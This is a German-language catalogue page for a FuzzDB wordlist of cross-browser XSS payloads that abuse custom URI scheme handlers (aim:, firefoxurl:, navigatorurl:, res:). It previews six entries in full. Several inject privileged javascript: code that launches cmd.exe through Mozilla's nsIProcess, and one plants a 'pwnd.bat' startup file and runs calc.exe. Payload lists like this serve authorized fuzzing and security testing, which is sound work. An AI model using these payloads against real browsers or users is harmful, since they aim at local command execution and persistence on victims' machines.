FuzzDB XSS URI Handler Payloads
Browserübergreifende XSS-Payloads, die benutzerdefinierte URI-Schema-Handler (aim:, firefoxurl:, navigatorurl:, res:) missbrauchen, um Skriptausführung oder den Start lokaler Befehle zu erreichen.
- Größe
- 1.8 KB
- Kategorie
- Fuzzing
- Quelle
- fuzzdb-project/fuzzdb
- Lizenz
- GPLv2
- Empfohlene Tools
- burpffufwfuzz
Vorschau
Die ersten 6 Einträge. Lade die vollständige Liste (1.8 KB) herunter oder kopiere sie über die Schaltflächen oben.
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)Browserübergreifende XSS-Payloads, die benutzerdefinierte URI-Schema-Handler (aim:, firefoxurl:, navigatorurl:, res:) missbrauchen, um Skriptausführung oder den Start lokaler Befehle zu erreichen.
Diese Liste ist auf Input-Fuzzing und Schwachstellensuche ausgerichtet. Sie umfasst rund 1.8 KB und harmoniert gut mit Tools wie burp, ffuf, wfuzz. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger eine Einschränkung darstellt.
Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
aus ihrer Upstream-Quelle auf GitHub ausgeliefert.
Bezogen von fuzzdb-project/fuzzdb und vertrieben unter GPLv2. Verwenden Sie Wortlisten nur gegen Systeme, für deren Test Sie ausdrücklich autorisiert sind.